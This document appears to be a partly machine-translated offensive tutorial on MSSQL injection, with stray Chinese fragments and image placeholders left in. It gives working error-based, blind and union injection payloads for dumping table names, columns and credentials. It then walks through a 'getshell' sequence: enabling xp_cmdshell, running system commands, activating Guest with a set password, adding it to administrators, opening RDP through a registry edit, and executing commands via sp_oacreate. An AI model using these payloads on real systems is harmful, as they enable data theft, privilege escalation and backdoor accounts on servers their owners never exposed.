Article directory

1. MSsql database
2. MSsql structure
3. MSsql key table
4. Common functions of Mssql
5. Mssql error injection
6. Blind injection of Mssql
- The following functions are commonly used for blind injection:
7. Joint injection
8. Injection process
9. getshell

1. MSsql database

Strongly typed databases strictly distinguish between numbers and characters.

2. MSsql structure

There are four default databases:

1. The master （重点）
saves the configuration, permissions, database definitions and other required information of the SQL Server instance.
2. Model
template database. Whenever you create a new database (including TempDB for the system database), a replica database will be created using the Model database and changed to the name you used when you created the database.
3. msdb
agent database, used to configure alerts using SQL Server agent and scheduled jobs, etc.
4. Tempdb
temporarily stores data and is used to store data temporarily generated during system operation, such as user-defined tables, indexes, etc.

3. MSsql key table

1. Sysdatabases table in master database

所有的库名The Sysdatabases table is only saved in the master database. The main fields saved in this table are: name(database name)

2. Sysobjects table

This system table exists in all databases, whether it is a user-created database or the system default database. This table is stored 当前数据库所有的表名(similar to the tables table in the information_schema database in MySQL). The main fields are: name (table name), id (table ID), xtype (created object).
When xtype='U', the representative is a table created by the user.

It is different from the database path method of MySQL:
Mysql: information_schema.tables
Mssql: master. dbo.sysobjects

3. Syscolumns table

This system table exists in all databases, whether it is a user-created database or the system default database.
The table is stored 当前数据库所有的字段名. The main fields are: name (field name respectively), id (table ID). The ID is the ID number of the table obtained from the sysobjects table.

4. Common functions of Mssql

function	function effect
db name()	Returns the name of the current database
host_name()	Return computer name
current_user	Returns the username of the current database
user	database user
substring()	String interception function
@@version	View database version
char()	ASCII conversion function
cast(text as type())	Character type conversion, if the conversion fails, the text result will be reported as an error and displayed on the page.
object_id()	Return the database table name ID based on the table name
object_name()	Return database table name based on ID
col_name(object_id,column_id) 举例：Col_name(object_id(‘users’),2)	Returns the name of the specified field (column) in the specified table

5. Mssql error injection

Since Mssql is a strongly typed database, an error will be reported once the data types do not match. At this time, we can use it 四则运算to 整型数据和字符型数据perform calculations, such as 1+user.

Example POC:'or 1=convert(int,@@version)--

6. Blind injection of Mssql

Similar to mysql, 区别在于使用的函数不同.

The following functions are commonly used for blind injection:

1. patindex(pattern,string)
#Returns the position where a certain character or regular expression appears for the first time in a string.
2. replace(string,substring1,substring2)
#Replace a substring that appears in the string with another string, that is, replace substring1 that appears in the string with substring2.
Example: replace('1-a 2-b','-', ':'), the return result is: 1:a 2:b
3. replicate(string,n)
#Copy the string a specified number of times.
Example: replicate('abc',3), the return result is: abcabcabc
4. stuff(string,pos,delete_length,insertstring)
#First delete a string in the string, and then insert a new substring as a replacement.
Example: stuff('xyz',2,1,'abc'), return The result is: xabcz
5. upper(string) and lower(string)
#Convert strings to uppercase or lowercase
6. rtrim(string) and ltrim(string)
#Remove trailing spaces or leading spaces in the string
7. charindex(expression1, expression2, [start_location])
#Return the starting position of the specified expression in the string. If the position is queried, return the position. If not, return false. In addition, the parameters of charindex are not case-sensitive.

7. Joint injection

1. Get the number of columns of the current table

id=-1 order by 4--+
4 does not report an error, 5 reports an error

2. Get the current database name

id=-1 union all select 1,2,db_name(),4--+
Return here: mozhe_db

3. Get the table name

id=-1 union all select top 1 1,2,name,4 from mozhe_db.dbo.sysobjects where xtype=’U’--+
Return here: manage

If you want to get the next table, you can use the old method. Just add: and name !='manage' after where, and the next table name will pop up.

4. Get table id

id=-1 union all select 1,id,3,4 from sysobjects where name=’manage’--+
Return here: 5575058

5. Get table field names

id=-1 union all select top 1 1,2,name,4 from syscolumns where id=5575058 --+
Return here: username

If you want to get the next field name, you can use the old method. Just add: and name !=' username' after where, and the next field name will pop up.

6. Get the data of the username field in the manage table

id=-1 union all select top 1 1,2, username ,4 from manage --+
Return here: admin_mz

If you want to get the next data, you can use the old method and add directly at the end: where username !='admin_mz', and the next field name will pop up.

8. Injection process

1. Judgment authority

If the page echo is normal, it is correct, otherwise an error is reported. Example POC:
and 1=(select IS_SRVROLEMEMBER('sysadmin')) –

2. Get the current database

and 1=(select db_name()) –

3. Get all data tables in the current database

and 1=convert(int,(select quotename(name) from 数据库名.dbo.sysobjects where xtype=‘U’ FOR XML PATH(‘’))) –

注意：
The convert function is forced to convert the data type.
The main function of the Quotename function is to add [], '', etc. to column names, table names, etc. in the stored procedure to ensure that the SQL statement can be executed normally.
FOR XML PATH displays the query result set in XML form, displaying multiple rows of results on the same line.

4. Get all fields of the specified data table in the current database

and 1=(select quotename(name) from database name.dbo.syscolumns where id =(select id from database name...sysobjects where name='specified table name') FOR XML PATH('')) –

5. Get the table data content in the specified database

and 1=(select top 1 * from specified database.dbo.specified table name where exclusion condition FOR XML PATH(''))–

9. getshell

1. mssql permissions

sa permissions: database operations, file management, command execution, registry reading, etc. system. It is the highest authority of mssql
db permissions: file management, database operations, etc. users-administrators
Public permissions: database operations guest-users

2. Open xp_cmdshell with SA permission to obtain host permissions

1) Determine whether xp_cmdshell is open

select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'
Insert image description here
Return 1 to open; return 0 to close

If the xp_cmdshell permission is not enabled, we can execute the following command to enable it. The following four steps will enable xp-cmdshell.

execute('sp_configure "show advanced options",1')  #将该选项的值设置为1
execute('reconfigure')                             #保存设置
execute('sp_configure "xp_cmdshell", 1')           #将xp_cmdshell的值设置为1
execute('reconfigure')                             #保存设置
execute('sp_configure')                            #查看配置
execute('xp_cmdshell "whoami"')                    #执行系统命令

exec sp_configure 'show advanced options',1;       
reconfigure;                                       
exec sp_configure 'xp_cmdshell',1;                 
reconfigure;                                      
exec sp_configure;                                 
exec xp_cmdshell 'whoami';

After system permissions can be executed, the premise is that the obtained host permissions are in the administrators group.

exec xp_cmdshell 'net user Guest 123456'              #给guest用户设置密码
exec xp_cmdshell 'net user Guest /active:yes'         #激活guest用户
exec xp_cmdshell 'net localgroup administrators Guest /add'  #将guest用户添加到administrators用户组
exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'        #开启3389端口

execute('sp_configure "show advanced options",1') #Set the value of this option to 1
execute('reconfigure') #Save settings
Although the first step is used to determine whether xp_cmdshell is open and the return value is 1, the command still cannot be executed. Use execute('xp_cmdshell "whoami"') This command is disabled by default

2) Then use the above execute steps to open xp_cmdshell

Insert image description here

3. Use sp_oacreate to execute system commands with SA permissions

使用sp_oacreate的前提：sql server数据服务未降权

We can use the com component sp_oacreate in sql server to execute system commands.

1) The following command can check whether sp_oacreate is allowed:

declare @shell int 
exec sp_oacreate 'wscript.shell',@shell output 
exec sp_oamethod @shell,'run',null,'whoami'